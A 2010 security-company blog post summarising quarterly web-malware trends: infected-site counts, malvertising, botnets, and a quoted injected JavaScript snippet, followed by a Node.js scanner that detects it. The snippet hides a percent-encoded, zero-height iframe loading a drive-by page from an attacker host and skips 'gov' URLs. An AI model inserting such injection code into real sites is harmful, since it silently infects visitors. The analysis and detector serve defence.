Monday, May 10, 2010

Q1'10 web-based malware data and trends

Each quarter we pull together data for web-based malware attacks from across the web. Our proprietary malware analysis platform allows us to monitor millions of websites and draw results from a wealth of data which we summarize in this blog. What we continue to see is that the web malware threat continues to grow significantly. Hackers are becoming increasingly sophisticated and bold in their attacks, which means that legitimate websites are more threatened than ever. Putting web site security best practices in place such as malware monitoring and containment is becoming an absolute must if businesses do not want to expose themselves and their customers to these attacks. A particularly interesting observation has been an increase in 'malvertising' attacks in which hackers plant malicious ads on high-profile ad networks and websites. We'll dig deeper into that but first, let's take a look at some of our results:

The Q1 2010 Data

In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.

This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.

The challenge for websites is that there are many different ways for them to get infected. For example, a site that uses a JavaScript widget that is hosted externally could be at risk of being compromised with web-based malware, as discussed in a Google report. Publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements served to their users on their site. Many sites (large and small) also rely on third parties to provide packaged software that powers applications on their website; examples include content management systems, blogging software and web server software. It is often difficult for websites to keep the software running their site up to date and patched to the latest version. Keeping server-side web applications up to date is just as challenging as, or even more challenging than, keeping client-side software up to date and patched. Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate the risk from both known and unknown vulnerabilities in web applications. In fact, in April there was a mass attack on WordPress sites in which attackers exploited a vulnerability to infect thousands of websites with malware.

As part of our quarterly malware update, we performed a study of a large pool of websites in which we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as JavaScript widget providers, ad networks, and/or packaged software providers). In fact, Fortune 500 web sites carry such a high risk because 69% of them use external JavaScript to render portions of their sites and 64% of them are running outdated web applications. (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)

On a side note: We launched a new service in Q1 called the Dasient Malware Risk Assessment which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.

Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%, although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering a loss of traffic, a decline in revenue, and damage to brand equity.


The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). Although a little higher than last quarter, this still indicates to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller footprint on an infected machine; historically, attackers have started up to a dozen or more new processes on machines they compromise.
23.8% of new processes started due to drive-by-downloads had one character filenames such as “a.exe” or “f.exe”.



Attackers prefer to use “.com” domains to host malware. “.com” was the most popular followed by “.cn”. The domain “dnparking.com” was an attacker site used to infect a relatively large number of sites early in the quarter.



ASP, HTML, and PHP pages were the most infected in that order. The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter which once again emphasizes the growing complexity in web sites and web applications.





Uptick in Malvertising Attacks in Q1

One of the major trends observed is the spike in malvertising attacks since the beginning of 2010. While content- and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.

Viruses and other malware were found lurking in ads on high-profile sites like The New York Times, DrudgeReport.com, TechCrunch and WhitePages.com, as well as in ads served by big ad delivery platforms such as Yahoo, Fox and Google.

We thought it may be useful to describe how malvertising attacks work, in general. In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers.

Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.

Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.

What is the Malware doing?

In many cases, the malware was trying to join a botnet. Botnets are networks of PCs that have been taken over by malware programs. What the botnet ends up doing depends on what the botnet 'master' wants it to do, but usually it will hook processes to capture keystrokes, send email spam, etc. Some of the more common mechanisms used to conduct drive-by-downloads included taking advantage of Adobe PDF exploits and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular, the 'Zeus' botnet has become very widely spread. NetWitness, based in Herndon, VA, released a report highlighting the kind of havoc the malware can wreak. It documents a Zeus botnet that controlled nearly 75,000 computers in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.

Another interesting observation from our research is how attackers interact with government web sites.

Cybercriminals not interested in CyberWar (yet?)


Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect sites. Their scripts are typically not very discriminating about which sites they attack. Government-run web sites, for instance, are also likely to be attacked by these automated scripts. For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the US Treasury had three of its web sites hacked.

It seems, though, that the attackers conducting such attacks are purely in it for the money. One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction. Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar. Why do we say that? In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:

if (document.location.href.indexOf("gov") >= 0) {
  // Page URL contains "gov": do nothing, no payload is served.
}
else {
  // Hidden wrapper so the injected frame is never visible to the visitor.
  document.write("<div style='display:none'>");
  // The iframe tag is percent-encoded so it does not appear as plain text in the page source;
  // unescape() rebuilds it at run time.
  document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%6B%6F%74%73%2E%39%39%36%36%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'));
  document.write("</div>");
}


Basically, the code above says that if the attacked web site is a government web site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls malicious content into the page and initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors of government sites, including government employees, as doing so could be interpreted as an act of cyber-war. What is also interesting is that the attackers could decide to launch a cyber-war at any time.
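To show how a site owner can detect this injection pattern in their own pages, here is an added example (not Dasient's code and not the attacker's script) in Node.js: it pulls inline script bodies out of page HTML, decodes unescape('...') payloads passed to document.write, and scores each resulting iframe by the evasion traits described above (percent-encoding, zero-height frame, display:none wrapper, "gov" URL guard). The sample page and the attacker.invalid host are constructed for the example.

```javascript
// Added example, not Dasient's code: scan page HTML for the injected
// document.write(unescape(...)) hidden-iframe pattern quoted above.

// Decode %XX and %uXXXX sequences the way the legacy unescape() does.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Strings passed to document.write(...) in a script body, with unescape('...')
// payloads decoded so the tag they build can be inspected.
function extractWrites(script) {
  const out = [];
  const re = /document\.write\s*\(\s*(?:(unescape)\s*\(\s*)?(['"])((?:\\.|(?!\2).)*)\2\s*\)?\s*\)/g;
  let m;
  while ((m = re.exec(script)) !== null) {
    out.push({ encoded: Boolean(m[1]), text: m[1] ? percentDecode(m[3]) : m[3] });
  }
  return out;
}

// If a written string builds an <iframe>, return its src, its host and whether
// it is sized to be invisible (width or height 0). Otherwise null.
function inspectIframe(text) {
  const tag = /<iframe\b([^>]*)>/i.exec(text);
  if (!tag) return null;
  const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(tag[1]);
  const h = /\bheight\s*=\s*["']?(\d+)/i.exec(tag[1]);
  const w = /\bwidth\s*=\s*["']?(\d+)/i.exec(tag[1]);
  let host = null;
  try { host = src ? new URL(src[1]).hostname : null; } catch (e) { host = null; }
  return { src: src ? src[1] : null, host,
           hidden: Boolean((h && h[1] === "0") || (w && w[1] === "0")) };
}

// Score one inline script: each evasion trait of the quoted injection adds 1,
// so a plain visible embedded video frame scores 0 and the injection scores 4.
function scanScript(script) {
  const govGuard = /location\.href\.indexOf\(\s*["']gov["']\s*\)\s*>=\s*0/.test(script);
  const hiddenWrapper = /display\s*:\s*none/i.test(script);
  const findings = [];
  for (const w of extractWrites(script)) {
    const f = inspectIframe(w.text);
    if (!f) continue;
    const traits = [w.encoded, f.hidden, hiddenWrapper, govGuard];
    findings.push({ host: f.host, src: f.src, obfuscated: w.encoded,
      hiddenFrame: f.hidden, hiddenWrapper, govGuard,
      score: traits.filter(Boolean).length });
  }
  return findings;
}

// Scan every inline <script> body in a page.
function scanHtml(html) {
  const results = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) results.push(...scanScript(m[1]));
  return results;
}

// Constructed sample page: the injected snippet (placeholder host) plus a benign write.
const SAMPLE_HTML = `<html><body><h1>Welcome</h1>
<script>
if (document.location.href.indexOf("gov") >= 0) {
}
else {
  document.write("<div style='display:none'>");
  document.write(unescape('%3Ciframe%20src%3Dhttp%3A//attacker.invalid:97/xo/dk.html%20width=100%20height=0%3E%3C/iframe%3E'));
  document.write("</div>");
}
</script>
<script>document.write("<p>footer</p>");</script>
</body></html>`;

for (const f of scanHtml(SAMPLE_HTML)) {
  console.log(`${f.score >= 3 ? "ALERT" : "info"}: iframe to ${f.host} (score ${f.score}/4)`);
}
```

The threshold of 3 is a constructed heuristic; in practice the decoded src host would be compared against a blocklist or a baseline of frames the site legitimately embeds.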

Summary

Based on our research, it is evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put sound security practices in place for their websites to protect their customers and their revenues. To make sure they are not exposed, businesses can mitigate their risk by monitoring their websites for malware regularly.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.

Keep your sites safe!
Your Dasient Team
